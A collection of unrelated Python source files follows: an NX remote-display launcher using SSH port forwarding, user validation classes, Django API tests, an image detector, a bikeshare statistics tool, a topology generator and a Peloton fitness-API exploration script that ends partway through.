class LocalNXAgent:
def __init__(self, display, extra_options=[], name=None):
self.display = display
self.session_dir = self._get_session_dir()
self.name = (name if name is not None
else "%s:%d" % (socket.getfqdn(), display))
self.options = {
'accept': 'localhost',
'listen': self.port_from_display(self.display),
}
for optstr in extra_options:
self.options.update(split_option_str(optstr))
self.pid_dir = self.session_dir.joinpath('pids')
@classmethod
def port_from_display(cls, display):
"""
Return the TCP port serving NX protocol corresponding to the given
X display number.
"""
return 4000 + display
def _get_session_dir(self):
if hasattr(self, 'session_dir'):
return self.session_dir
return get_nx_root().joinpath('C-%d' % self.display)
def is_running(self):
try:
pidfile = self.pid_dir.joinpath('agent')
with open(pidfile, 'r') as f:
self.pid = int(f.read())
except (IOError, ValueError), e:
return False
cmd = cmd_from_pid(self.pid)
if cmd and cmd.lower().endswith('nxagent'):
return True
return False
def start(self):
# The options file has to be secret because it contains the cookie
# The log files have to be secret because they'll print the
# supplied and actual cookie on authentication failure
# Any caches will have to be secret
# So we just make everything secret
os.umask(077)
if self.session_dir.isdir():
self.session_dir.rmtree()
self.session_dir.makedirs()
self.cookie = os.urandom(16).encode('hex')
self.options['cookie'] = self.cookie
subprocess.check_call(
['xauth', 'add', ':%d' % self.display, '.', self.cookie])
option_filename = self.session_dir.joinpath('options')
write_options(option_filename, self.options, self.display)
session_filename = self.session_dir.joinpath('session')
with open(session_filename, 'w') as session_file:
process = subprocess.Popen(['nxagent', '-nokbreset',
'-name', self.name,
'-auth', os.path.expanduser('~/.Xauthority'),
'-display',
'nx/nx,options=%s:%d' % (option_filename, self.display),
':%d' % self.display],
stdout=session_file, stderr=subprocess.STDOUT)
self.pid = process.pid
try:
pidfile = self.pid_dir.joinpath('agent')
if not pidfile.parent.isdir():
pidfile.parent.makedirs()
with open(pidfile, 'w') as f:
f.write(str(self.pid))
except:
# If we can't write out the pid, kill the agent right away
os.kill(self.pid, signal.SIGTERM)
raise
# Wait for the server to disambiguate itself
SERVER_STARTUP_TIMEOUT = 10
POLL_INTERVAL = 0.05
for i in range(int(SERVER_STARTUP_TIMEOUT / POLL_INTERVAL)):
if process.poll() is not None \
or self.is_waiting_for_connection():
break
time.sleep(POLL_INTERVAL)
if process.poll() is None and self.is_waiting_for_connection():
# Run ~/.nxstartup
nxstartup = path('~/.nxstartup').expanduser()
if nxstartup.isfile():
userinfo = pwd.getpwuid(os.getuid())
shell = userinfo.pw_shell
home = userinfo.pw_dir
subprocess.Popen(['env', '-',
'DISPLAY=:%d' % self.display,
# I don't know why 'env - sh -l foo' leaves HOME unset
'HOME=%s' % userinfo.pw_dir,
'SHELL=%s' % shell,
'USER=%s' % userinfo.pw_name,
shell, '-l', nxstartup],
stdout=session_file, stderr=subprocess.STDOUT)
else:
try:
if process.poll() is None:
os.kill(process.pid, signal.SIGTERM)
except OSError:
pass
self.cookie = FAILURE_SENTINEL
def accept_new_connection(self):
# HUPing the agent while it is accepting connections tells it
# to stop accepting connections. So don't HUP it in that case.
if not self.is_waiting_for_connection():
os.kill(self.pid, signal.SIGHUP)
def is_waiting_for_connection(self):
statuses = self.session_dir.joinpath('session').lines()
last_status = statuses[-1] if statuses else ""
return 'Waiting for connection'.lower() in last_status.lower()
def read_cookie_from_options(self):
options = self.session_dir.joinpath('options').text()
self.cookie = split_option_str(options)['cookie']
def listen(self):
if self.is_running():
self.accept_new_connection()
self.read_cookie_from_options()
else:
self.start()
def main(args=None):
if args is None:
args = sys.argv[1:]
optp = OptionParser(usage=__doc__)
default_remote_options = "link=1m,cache=64m,images=128m,taint=1"
optp.add_option('--remote-options', action='append', dest='remote_options',
default=[], help="""Options to pass to nxagent when starting
it. See `nxproxy -help` for more. Default is %s""" %
default_remote_options)
optp.add_option('--local-options', action='append', dest='local_options',
default=[], metavar='OPTIONS')
optp.add_option('-p', '--local-port', default=None, type=int,
metavar='PORT', dest='local_port', help ="""Use TCP port PORT
for the local NX proxy endpoint.""")
optp.add_option('--remote-viewnx-cmd', dest='viewnx_cmd', default='viewnx',
help="Location of viewnx if not on $PATH", metavar='COMMAND')
optp.add_option('-S', '--server', action='store_true', dest='server_mode')
optp.add_option('--name', dest='name', default=None, help="Window name")
(options, args) = optp.parse_args(args)
if len(args) != 1:
optp.print_help()
return 1
display_spec = args[0]
host, display = display_spec.split(':', 1)
display = int(display)
if options.server_mode:
options.remote_options = (options.remote_options
or [default_remote_options])
agent = LocalNXAgent(display, options.remote_options,
name=options.name)
agent.listen()
print 'Cookie:', agent.cookie
if agent.cookie == FAILURE_SENTINEL:
print >> sys.stderr, 'nxagent start failed. Log file:\n'
print >> sys.stderr, \
"".join(agent.session_dir.joinpath('session').lines()),
else:
# ssh to host with port binding
# run viewnx -S (yields cookie)
# locally run nxproxy -S localhost:bound cookie=cookie
remote_port = LocalNXAgent.port_from_display(display)
if options.local_port is None:
options.local_port = remote_port
# This part is kind of yucky; we ssh and assume we get a shell
# We run this command in server mode
# Wait for a cookie to come back
# If either party returns too much or too little at any point
# deadlock
proc = subprocess.Popen([
'ssh', '-T',
# You should have this in your ~/.ssh/config too!
'-o', 'ExitOnForwardFailure=yes',
'-L', 'localhost:%d:localhost:%d'
% (options.local_port, remote_port),
host],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=1)
try:
proc.stdin.write('set -e\n')
cmd = [options.viewnx_cmd, '--server', display_spec]
if options.name is not None:
cmd += ['--name', options.name]
for opt in options.remote_options:
cmd += ['--remote-options', opt]
def cmd_to_sh(arglist):
def q(arg):
return "'%s'" % arg.replace("'", "'\''")
return " ".join(q(arg) for arg in arglist)
proc.stdin.write(cmd_to_sh(cmd) + '\n')
cookieline = proc.stdout.readline().strip()
failure_pattern = '^Cookie: %s$' % FAILURE_SENTINEL
match = re.match(failure_pattern, cookieline)
if match:
proc.stdin.close()
print proc.stdout.read(),
return 1
cookie_pattern = '^Cookie: ([a-f0-9]{32})$'
match = re.match(cookie_pattern, cookieline)
if not match:
proc.stdin.close()
raise Exception(('Expected a cookie specification '
'in the form %s from %s, got %s instead.')
% (repr(cookie_pattern), repr(cmd),
repr(cookieline + proc.stdout.read())))
cookie = match.groups()[0]
try:
proxy_options = {
'cookie': cookie,
'kill': proc.pid,
}
for optstr in options.local_options:
proxy_options.update(split_option_str(optstr))
os.umask(077)
option_filename = get_nx_root().joinpath(
'S-%d' % display, 'options')
if not option_filename.parent.isdir():
option_filename.parent.makedirs()
write_options(option_filename, proxy_options, display)
os.execvp('nxproxy', ['nxproxy', '-S',
'localhost:%d' % display,
"options=%s" % option_filename])
except OSError, e:
print >> sys.stderr, ('nxproxy failed to launch. '
'Please make sure it is in your PATH.')
raise
except:
# Don't orphan the ssh process
if proc.poll() is None:
os.kill(proc.pid, signal.SIGTERM)
raise
if __name__ == '__main__':
sys.exit(main())
|
17,063 | d10761791ca285a68a7d3479b6ae9b4506004142 | from sdk.types import TypeUuid, TypeString, TypeBase, TypeInteger
class UserId(TypeUuid):
pass
class UserName(TypeString):
def validate(self, value_name=''):
super().validate('Nombre de usuario')
if self.is_required() and self._value.__len__() < 3:
raise Exception("El nombre debe ser mayor a 2 caracteres")
class UserLastName(TypeString):
def __init__(self, value: str):
super().__init__(value, False)
def validate(self, value_name=''):
super().validate('Apellido')
if self.is_not_none() and self._value.__len__() < 4:
raise Exception("El apellido debe ser mayor a 3 caracteres")
class UserYear(TypeInteger):
def validate(self, value_name=''):
super().validate()
if self.is_required() and self._value < 0:
raise Exception("la edad tiene que ser mayor que cero")
class User:
def __init__(self, id, name, last_name):
self.id = id
self.name = name
self.last_name = last_name
class UserFactory:
@staticmethod
def create(id, name, last_name) -> User:
id = UserId(id)
name = UserName(name)
last_name = UserLastName(last_name)
UserFactory._validate([id, name, last_name])
return User(id.value(), name.value(), last_name.value())
@staticmethod
def _validate(value_object):
for vo in value_object: # type: TypeBase
vo.validate()
|
17,064 | 75ab687a036a1a0ccfe27e43d5508ed1c3933a8b | import uuid
from django.shortcuts import resolve_url
from rest_framework.test import APITestCase
from channels.models import Channel, Category
class ChannelApiTest(APITestCase):
def setUp(self):
self.channel = Channel.objects.create(name='market')
def test_list(self):
url = resolve_url('channel-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get(self):
url = resolve_url('channel-detail', pk=self.channel.uuid)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_not_found(self):
url = resolve_url('channel-detail', pk=uuid.uuid4())
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
class CategoryApiTest(APITestCase):
def setUp(self):
channel = Channel.objects.create(name='market')
self.category = Category.objects.create(
name='book', channel=channel
)
self.category2 = Category.objects.create(
name='book slim', channel=channel, parent=self.category
)
def test_list(self):
url = resolve_url('category-list')
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get(self):
url = resolve_url('category-detail', pk=self.category.pk)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_not_found(self):
url = resolve_url('category-detail', pk=uuid.uuid4())
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_get_subcategory_detail(self):
url = resolve_url('category-detail', pk=self.category2.pk)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
|
17,065 | cbe85a40a6fcf48b8d7a424c3fd955a7bde58e97 | from detec.dete import subway_det
from class_n.class_n_model import model_n
from class_2.class_2_model import model_2
from data import data_detile
from config import Config
import cv2
import numpy as np
from PIL import Image
class detector(object):
def __init__(self,config):
self.config=config
self.data=data_detile(self.config)
# 加载检测模块
self.sud_det=subway_det(self.config.config_file,self.config.checkpoint_file,self.config)
# 加载粗粒度分类模块
self.Coarse_grained_class=model_n(self.config.model_path_Coarse_grained,self.data.transforms)
# 加载细粒度分类模块
self.fine_grained_class=model_2(self.config.model_path_fine_grained,self.data.transforms)
def detecte(self,img):
self.result = []
# 检测模块
self.roi_list = self.sud_det.detector(img)
# 将每一个roi输入分类网络
for i in range(self.roi_list.shape[0]):
box=self.roi_list[i,0:4]
confidence=self.roi_list[i,-2]
class_name=self.roi_list[i,-1]
# 这里只对低分框进行在分类
if float(confidence)>0.05:
self.result.append(self.roi_list[i])
continue
else:
box=box.astype(np.int)
img_test=img[box[1]:box[3],box[0]:box[2],:]
img_test = Image.fromarray(cv2.cvtColor(img_test,cv2.COLOR_BGR2RGB))
img_test=img_test.resize((self.config.size,self.config.size))
# 粗粒度分类
class_name=self.Coarse_grained_class.test_img(img_test,flag=False,score_thr=0.5)
if class_name[0][0]!=0:
continue
else:
# 细粒度分类
class_name=self.fine_grained_class.test_img(img_test,flag=False,score_thr=0.5)
if class_name[0][0]!=0:
continue
else:
# 将检测结果输出为类别
self.roi_list[i, 0]=class_name[0][0]
self.result.append(self.roi_list[i])
return self.result
if __name__ == '__main__':
img_path='/media/cbird/新加卷1/miao/NS2/mix/1000-3000/all/img/1 (685).png'
img=cv2.imread(img_path)
cfg=Config()
dete=detector(cfg)
result=dete.detecte(img)
print (result)
|
17,066 | 75f16e1df266b41924ea2e2e04c9c0561712d329 | import time
import pandas as pd
import numpy as np
CITY_DATA = { 'chicago': 'chicago.csv',
'new york': 'new_york_city.csv',
'washington': 'washington.csv' }
# my_list
cities = ["chicago", "new york", "washington"]
filters = ["month", "day", "both", "none"]
months = ["all", "january", "february", "march", "april", "may","june"]
days = ["all", "monday", "tuesday", "wednesday", "thursday", "friday", "saturday", "sunday"]
# question
question_1 = "Would you like to see data for Chicago, New York, or Washington?\n"
question_2 = "Would you like to filter the data by month, day, both or not at all? Type none for no time filter\n"
question_3 = "Which month - January, February, March, April, May, or June?\n"
question_4 = "Which day - Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, or Sunday?\n"
def handle_invalid_inputs(question,my_list):
"""
Gets, tests if the input of a question(question) belongs to a list(my_list) that we attend
and handle invalid inputs of the user.
Args:
(str) question - the question for what we want to get and test the input of the user.
(list) my_list - the list of answer that we wish to have.
Returns:
(str) final_answer - a string containing a good input typed by the user.
"""
final_answer = None
while final_answer not in my_list:
final_answer = input(question).lower()
return final_answer
def get_month():
"""
Gets the input month choosed by the user in case where filter_choosed equal to "month".
Returns:
month - name of the month
"""
return handle_invalid_inputs(question_3, months)
def get_day():
"""
Gets the input day choosed by the user in case where filter_choosed equal to "day".
Returns:
day - string contening the name of the day
"""
return handle_invalid_inputs(question_4, days)
def get_both():
"""
Gets the input month and day choosed by the user in case where filter_choosed equal to "both".
Returns:
(str) get_month()
(str) get_day()
"""
return get_month(), get_day()
def get_filters():
"""
Asks user to specify a city, month, and day to analyze.
Returns:
(str) city - name of the city to analyze
(str) month - name of the month to filter_choosed by, or "all" to apply no month filter_choosed
(str) day - name of the day of week to filter_choosed by, or "all" to apply no day filter_choosed
(str) filter_choosed - name of the the choosed filter_choosed
"""
print('Hello! Let\'s explore some US bikeshare data!')
# get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs
city = handle_invalid_inputs(question_1, cities)
# get the user input of the filter_choosed (month, day, both, or not at all(none))
filter_choosed = handle_invalid_inputs(question_2, filters)
# if filter_choosed == "month"
if filter_choosed == "month":
# get user input for month (all, january, february, ... , june)
month = get_month()
day = "all"
# if filter_choosed == "day"
if filter_choosed == "day":
# get user input for day of week (all, monday, tuesday, ... sunday)
day = get_day()
month = "all"
# if filter_choosed == "both"
if filter_choosed == "both":
# get user input for day of week and month
month, day = get_both()
# if filter_choosed == none
if filter_choosed == "none":
month = "all"
day = "all"
print('-'*40)
return city, month, day, filter_choosed
def load_data(city, month, day):
"""
Loads data for the specified city and filter_chooseds by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter_choosed by, or "all" to apply no month filter_choosed
(str) day - name of the day of week to filter_choosed by, or "all" to apply no day filter_choosed
Returns:
df - Pandas DataFrame containing city data filter_chooseded by month and day
"""
# load data file into a dataframe
df = pd.read_csv(CITY_DATA[city])
# convert the Start Time column to datetime
df['Start Time'] = pd.to_datetime(df['Start Time'])
# extract month, day of week and hour from Start Time to create new columns
df['month'] = df['Start Time'].dt.month
df['day_of_week'] = df['Start Time'].dt.weekday_name
df['hour'] = df['Start Time'].dt.hour
# filter_choosed by month if applicable
if month != 'all':
# use the index of the months list to get the corresponding int
months = ["january", "february", "march", "april", "may", "june"]
month = months.index(month) + 1
# filter_choosed by month to create the new dataframe
df = df[df['month'] == month]
# filter_choosed by day of week if applicable
if day != 'all':
# filter_choosed by day of week to create the new dataframe
df = df[df['day_of_week'] == day.title()]
return df
def popular_counts_column(column):
"""
calculate statistics(popular entry of that column and his occurrence) on the most frequent times of travel.
Args:
(pd.Series) column - column of a DataFrame
Returns:
popular_anything - string containing the popular entry
counts_anything - int containing number of occurence of that popular entry
"""
popular_anything = column.mode()[0]
counts_anything = column.value_counts()[popular_anything]
return popular_anything, counts_anything
def time_stats(df, filter_choosed):
"""Displays statistics on the most frequent times of travel."""
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
# display the most common month and number of occurrence
popular_month, counts_month = popular_counts_column(df['month'])
print('The Most Popular month:{}, Counts:{},'.format(popular_month, counts_month), end = ' ')
# display the most common day of week and number of occurence
popular_day, counts_day = popular_counts_column(df['day_of_week'])
print('The Most Popular day:{}, Counts:{},'.format(popular_day, counts_day), end = ' ')
# display the most common start hour and number of occurrence
popular_hour, counts_hour = popular_counts_column(df['hour'])
print('The Most Popular hour:{}, Counts:{}, Filter:{}\n'.format(popular_hour, counts_hour, filter_choosed))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def station_stats(df, filter_choosed):
"""Displays statistics on the most popular stations and trip."""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
# display most commonly used start station
popular_start, counts_start = popular_counts_column(df['Start Station'])
print('Start Station:{}, Counts:{},'.format(popular_start, counts_start), end = ' ')
# display most commonly used end station
popular_end, counts_end = popular_counts_column(df['End Station'])
print('End Station:{}, Counts:{},'.format(popular_end, counts_end, filter_choosed), end = ' ')
# display most frequent combination of start station and end station trip
popular_start_end, counts_start_end = popular_counts_column(df['Start Station'] + '-' + df['End Station'])
print("Popular Trip:('{}'-'{}'), Counts:{}, Filter:{}\n".format(popular_start_end.split('-')[0],popular_start_end.split('-')[1], counts_start_end, filter_choosed))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(df, filter_choosed):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
# display total travel time
total_travel_time = df['Trip Duration'].sum()
travel_number = df['Trip Duration'].size
print('Total Duration:{}, Count:{},'.format(total_travel_time, travel_number), end = ' ')
# display mean travel time
mean_travel_time = df['Trip Duration'].mean()
print('Avg Duration:{}, Filter:{}\n'.format(mean_travel_time, filter_choosed))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def user_stats(df, city, filter_choosed):
"""Displays statistics on bikeshare users."""
print('\nCalculating User Stats...\n')
start_time = time.time()
# Display counts of user types
print('Statistics for User Types ...... \n')
user_types_dict = dict(df['User Type'].value_counts())
for key, value in user_types_dict.items():
print('{}:{}'.format(key,value), end = ' ')
print('filter:', filter_choosed)
# Display counts of gender
print('\nStatistics for gender ...... \n')
if city != 'washington':
gender_dict = dict(df['Gender'].value_counts())
for key, value in gender_dict.items():
print('{}:{}'.format(key,value), end = ' ')
print(' filter:', filter_choosed)
else:
print('No data about gender')
# Display earliest, most recent, and most common year of birth
print('\nStatistics for year of birth ...... \n')
if city != 'washington':
earliest_year = df['Birth Year'].min()
most_recent_year = df['Birth Year'].max()
popular_year = df['Birth Year'].mode()[0]
print('Earliest Year:{}, Most Recent Year:{}, Most Popular Year:{}, filter:{}'.format(earliest_year, most_recent_year, popular_year, filter_choosed))
else:
print('No data about birth of year')
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def individual_trip_data(df):
"""Displays individual trip data of each user."""
data = df.to_dict('records')
i = 0
j = 5
length = len(data)
while True:
see_trip = input('\nWould you like to individual trip data? Type yes or no.\n')
if see_trip.lower() != 'yes':
break
else:
if i < j and i < length:
for i in range(j):
print(data[i])
i = j
j += 5
def main():
while True:
city, month, day, filter_choosed = get_filters()
df = load_data(city, month, day)
time_stats(df, filter_choosed)
station_stats(df, filter_choosed)
trip_duration_stats(df, filter_choosed)
user_stats(df, city, filter_choosed)
individual_trip_data(df)
restart = input('\nWould you like to restart? Enter yes or no.\n')
if restart.lower() != 'yes':
break
if __name__ == "__main__":
main()
|
17,067 | 78d312dc52e14a7338e47e9f38620b476aba774b | from random import randint
import random
import sys
num_nodes = sys.argv[1]
topo_type = sys.argv[2]
gain_low = sys.argv[3]
gain_max = sys.argv[4]
num_nodes = int(num_nodes)
gain_low = float(gain_low)
gain_max = float(gain_max)
nodes = {}
print num_nodes
print topo_type
print gain_low
print gain_max
for i in range(1,num_nodes+1):
nodes[i] = []
# tree
if(topo_type == '1'):
cur = 1
for i in range(1,num_nodes+1):
if(cur<(num_nodes)):
nodes[i].append(cur+1)
nodes[cur+1].append(i)
cur += 1
if(cur<(num_nodes-1)):
nodes[i].append(cur+1)
nodes[cur+1].append(i)
cur += 1
# chain
if(topo_type == '2'):
for i in range(1,num_nodes):
nodes[i].append(i+1)
nodes[i+1].append(i)
#grid
if(topo_type == '3'):
for i in range(1,num_nodes+1):
if(num_nodes>4):
num_of_neighbors = randint(1,3)
else:
num_of_neighbors = randint(1,4)
for j in range(num_of_neighbors):
neighbor = i
while neighbor==i:
neighbor = randint(1,num_nodes)
if(neighbor not in nodes[i]):
nodes[i].append(neighbor)
nodes[neighbor].append(i)
gain = 0.0
fd = open("topo.txt",'w')
for i in nodes.keys():
for j in nodes[i]:
gain = round(random.uniform(gain_low,gain_max),1)
if(gain != 0.0):
gain = "-" + str(gain)
else:
gain = str(gain)
fd.write(str(i) + " " + str(j) + " " + gain)
fd.write("\n")
fd.close() |
17,068 | c0611899d28595d8d7e87bbafe8466917e926d36 | import requests
import csv
import json
from datetime import datetime
# from datetime import timezone
# from datetime import date
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import pandas as pd
s = requests.Session()
payload = {'username_or_email':'<insert username>', 'password':'<insert password>'}
xx = s.post('https://api.onepeloton.com/auth/login', json=payload)
'''
The following script has been a way for me to play around with my own Peloton fitness data. My family's Peloton bicycle and my most recent download of the Peloton Digital Application
has been motivating my workouts during this period of social distancing. As a data person, I have been fascinated by the amount of data amassed, shared and available for visualization
while working out. At any given moment, there are people across the world riding with me, running with or stretching with me. I know when a friend has a taken a new class and I know if I have beat
my record from the previous day. How does Peloton do it? What is the data structure underlying and powering the app, the tablet, the website, the notifications?
I must give credit to
https://github.com/geudrik/peloton-api
https://rdrr.io/github/elliotpalmer/pelotonr/api/
where I found the API endpoints and could have used either library. But the best way to explore data is to struggle and wrangle with it myself while at the same time refamiliarizing myself
with Python, Pandas and data manipulation.
From what I have found, the API fields are clear, data is consistent and clear.
There are some funny quirks which seem to be a result from Peloton's growth- starting with cycling and movement to classes of all types
1. Nesting of data within 'ride' json field even for a "running" class, or
2. the total_output only included for cycling classes instead of creating a more standard way to calculate total output across all types of classes)
3. 'total_leaderboard' on top level of json also often empty.
I hope to continue to explore and document more of the fields and explain what they mean to better think of my workouts in the form of data.
'''
#########################################
##### Profile ######
#########################################
# meContent = s.get('https://api.onepeloton.com/api/me').json()
###### KEY NAMES
# [u'username', u'last_name', u'is_demo', u'weight', u'is_profile_private', u'cycling_ftp_workout_id', u'created_country', u'cycling_workout_ftp', u'height', u'is_provisional', u'cycling_ftp', u'id',
# u'total_pending_followers', u'block_explicit', u'facebook_access_token', u'customized_max_heart_rate', u'is_strava_authenticated', u'obfuscated_email', u'hardware_settings', u'is_complete_profile', u'instructor_id', u'v1_referrals_made',
# u'last_workout_at', u'location', u'is_internal_beta_tester', u'facebook_id', u'cycling_ftp_source', u'has_active_digital_subscription', u'email', u'phone_number', u'contract_agreements', u'middle_initial', u'quick_hits',
# u'external_music_auth_list', u'first_name', u'card_expires_at', u'birthday', u'has_signed_waiver', u'customized_heart_rate_zones', u'referrals_made', u'is_external_beta_tester',
# u'paired_devices', u'total_pedaling_metric_workouts', u'total_workouts', u'default_max_heart_rate', u'name', u'is_fitbit_authenticated', u'has_active_device_subscription', u'gender',
# u'created_at', u'workout_counts', u'total_non_pedaling_metric_workouts', u'member_groups', u'default_heart_rate_zones', u'image_url', u'total_following', u'estimated_cycling_ftp', u'can_charge', u'total_followers']
userid = "c3ff56ef4c834f8eb682e724494e1d27" # meContent['id']
#########################################
##### Workouts ######
#########################################
# The workouts endpoint truncates 20 to page however the workoutsFullEndpoint passes a parameter that allows a larger limit.
# It was easier to hack this and set a large limit (which I knew based on my application dashboard)
workoutsPagingEndpoint = 'https://api.onepeloton.com/api/user/%s/workouts' % (userid)
workoutsFullEndpoint = 'https://api.onepeloton.com/api/user/%s/workouts?joins=ride&limit=%s' % (userid, 200) #The number should be changed - but just putting in limit that I know is past the total number of workouts
workouts = s.get(workoutsFullEndpoint).json()
###### KEY NAMES
# [u'count', u'summary', u'page_count', u'show_next', u'sort_by', u'show_previous', u'next', u'limit', u'aggregate_stats', u'total', u'data', u'page']
# Need to find way to loop through all the page count, 'page_count' shows total number of pages and 'page' is the page that you are on...
# Data of workout is found inside 'data' key
workoutData = workouts['data']
# In order to avoid running through endpoint - just grab a list of workoutId to use for later endpoint
listOfWorkoutIds = []
for workout in workoutData:
# Sample workout
# {u'workout_type': u'class', u'total_work': 0.0, u'is_total_work_personal_record': False, u'device_type': u'iPhone', u'timezone': u'America/New_York', u'device_time_created_at': 1586800817, u'id': u'8b83bece729648e0a8dc2671c66a3b66', u'fitbit_id': None, u'peloton_id': u'84360c083b714f5d93f937d4d07d2102', u'user_id': u'c3ff56ef4c834f8eb682e724494e1d27', u'title': None, u'has_leaderboard_metrics': False, u'has_pedaling_metrics': False, u'platform': u'iOS_app', u'metrics_type': None, u'fitness_discipline': u'stretching', u'status': u'COMPLETE', u'start_time': 1586815306, u'name': u'Stretching Workout', u'strava_id': None, u'created': 1586815217, u'created_at': 1586815217, u'end_time': 1586815896}
# print workout['total_work'] -- Only cycling classes have total_work when looping through, all other data is inside the 'ride'
# print workout['fitness_discipline']
workoutId = workout['id']
# Help to find specific Id's if need to test different categories
# if workout['fitness_discipline'] in ['cycling', 'running']:
# # do something
# else:
# # do something else
listOfWorkoutIds.append(workoutId)
## Get Class details for an individual workout. For example (Stretching Class example): 8b83bece729648e0a8dc2671c66a3b66, Walking class: 3d4e2277bca743cfa839a7ffae6ff2ac
## This is the workout of a person for a particular class
## This has an associated peleton_id (To what is this associated?)
## The finalData list is a list of dictionaries to say output to csv if want to chart elsewhere (outside of python)
finalData = []
#########################################
##### Specific Workout ######
#########################################
workoutDetailEndpoint = 'https://api.onepeloton.com/api/workout/%s'
# [u'workout_type', u'total_work', u'is_total_work_personal_record', u'device_type', u'total_leaderboard_users', u'timezone', u'leaderboard_rank', u'device_time_created_at',
# u'id', u'fitbit_id', u'peloton_id', u'user_id', u'title', u'has_leaderboard_metrics', u'has_pedaling_metrics', u'platform', u'metrics_type', u'achievement_templates',
# u'fitness_discipline', u'status', u'device_type_display_name', u'start_time', u'name', u'strava_id', u'created', u'created_at', u'ftp_info', u'end_time', u'ride']
## Inside ride is where the data for the workout lives - Question: the data for the class changes- so is the workoutid unique and/or does the meta class data change
#########################################
##### Performance Graph ######
#########################################
## Performance Graph endpoint
workoutPerformanceEndpoint = 'https://api.onepeloton.com/api/workout/%s/performance_graph'
###### KEY NAMES
# [u'is_class_plan_shown', u'splits_data', u'location_data', u'average_summaries', u'metrics', u'segment_list', u'duration', u'is_location_data_accurate', u'has_apple_watch_metrics', u'summaries', u'seconds_since_pedaling_start']
# workoutPerformanceDetail['average_summaries'] Example:
# [{u'display_name': u'Avg Pace', u'slug': u'avg_pace', u'value': 16.22, u'display_unit': u'min/mi'}, {u'display_name': u'Avg Speed', u'slug': u'avg_speed', u'value': 3.7, u'display_unit': u'mph'}]
# workoutPerformanceDetail['summaries'] Example
# [{u'display_name': u'Distance', u'slug': u'distance', u'value': 1.23, u'display_unit': u'mi'}, {u'display_name': u'Elevation', u'slug': u'elevation', u'value': 74, u'display_unit': u'ft'}, {u'display_name': u'Calories', u'slug': u'calories', u'value': 146, u'display_unit': u'kcal'}]
workoutInstructorEndpoint = 'https://api.onepeloton.com/api/workout/%s?joins=ride.instructor'
# "https://api.onepeloton.com/api/workout/<workout_id>?joins=ride.instructor"
# "https://api.onepeloton.com/api/workout/<workout_id>?joins=ride,ride.instructor"
# These two endpoints are identical, perhaps once joining with the ride.instructor data, the entire ride dict is included
###### KEY NAMES
'''
"created_at", "device_type", "end_time", "fitbit_id", "fitness_discipline", "has_pedaling_metrics", "has_leaderboard_metrics",
"id", "is_total_work_personal_record", "metrics_type", "name", "peloton_id", "platform", "start_time", "strava_id", "status",
"timezone", "title", "total_work", "user_id", "workout_type",
"ride",
"ride.instructor",
"ride.instructor.id",
"ride.instructor.bio",
"ride.instructor.short_bio",
"ride.instructor.coach_type",
"ride.instructor.is_filterable",
"ride.instructor.is_visible",
"ride.instructor.list_order",
"ride.instructor.featured_profile",
"ride.instructor.film_link",
"ride.instructor.facebook_fan_page",
"ride.instructor.music_bio",
"ride.instructor.spotify_playlist_uri",
"ride.instructor.background",
"ride.instructor.ordered_q_and_as",
"ride.instructor.instagram_profile",
"ride.instructor.strava_profile",
"ride.instructor.twitter_profile",
"ride.instructor.quote",
"ride.instructor.username",
"ride.instructor.name",
"ride.instructor.first_name",
"ride.instructor.last_name",
"ride.instructor.user_id",
"ride.instructor.life_style_image_url",
"ride.instructor.bike_instructor_list_display_image_url",
"ride.instructor.web_instructor_list_display_image_url",
"ride.instructor.ios_instructor_list_display_image_url",
"ride.instructor.about_image_url",
"ride.instructor.image_url",
"ride.instructor.jumbotron_url",
"ride.instructor.jumbotron_url_dark",
"ride.instructor.jumbotron_url_ios",
"ride.instructor.web_instructor_list_gif_image_url",
"ride.instructor.instructor_hero_image_url",
"ride.instructor.fitness_disciplines",
"ride.class_type_ids",
"ride.content_provider",
"ride.content_format",
"ride.description",
"ride.difficulty_estimate",
"ride.overall_estimate",
"ride.difficulty_rating_avg",
"ride.difficulty_rating_count",
"ride.difficulty_level",
"ride.duration",
"ride.equipment_ids",
"ride.equipment_tags",
"ride.extra_images",
"ride.fitness_discipline",
"ride.fitness_discipline_display_name",
"ride.has_closed_captions",
"ride.has_pedaling_metrics",
"ride.home_peloton_id",
"ride.id",
"ride.image_url",
"ride.instructor_id",
"ride.is_archived",
"ride.is_closed_caption_shown",
"ride.is_explicit",
"ride.has_free_mode",
"ride.is_live_in_studio_only",
"ride.language",
"ride.origin_locale",
"ride.length",
"ride.live_stream_id",
"ride.live_stream_url",
"ride.location",
"ride.metrics",
"ride.original_air_time",
"ride.overall_rating_avg",
"ride.overall_rating_count",
"ride.pedaling_start_offset",
"ride.pedaling_end_offset",
"ride.pedaling_duration",
"ride.rating",
"ride.ride_type_id",
"ride.ride_type_ids",
"ride.sample_vod_stream_url",
"ride.scheduled_start_time",
"ride.series_id",
"ride.sold_out",
"ride.studio_peloton_id",
"ride.title",
"ride.total_ratings",
"ride.total_in_progress_workouts",
"ride.total_workouts",
"ride.vod_stream_url",
"ride.vod_stream_id",
"ride.captions",
"ride.excluded_platforms",
"created",
"device_time_created_at",
"achievement_templates",
"leaderboard_rank",
"total_leaderboard_users",
"ftp_info",
"ftp_info.ftp",
"ftp_info.ftp_source",
"ftp_info.ftp_workout_id",
"device_type_display_name"
'''
# Loop through workoutIds in the list to grab some meta data on workout itself
for wkid in listOfWorkoutIds:
workoutDetail = s.get(workoutDetailEndpoint % (wkid)).json()
if workoutDetail['fitness_discipline'] != 'meditation':
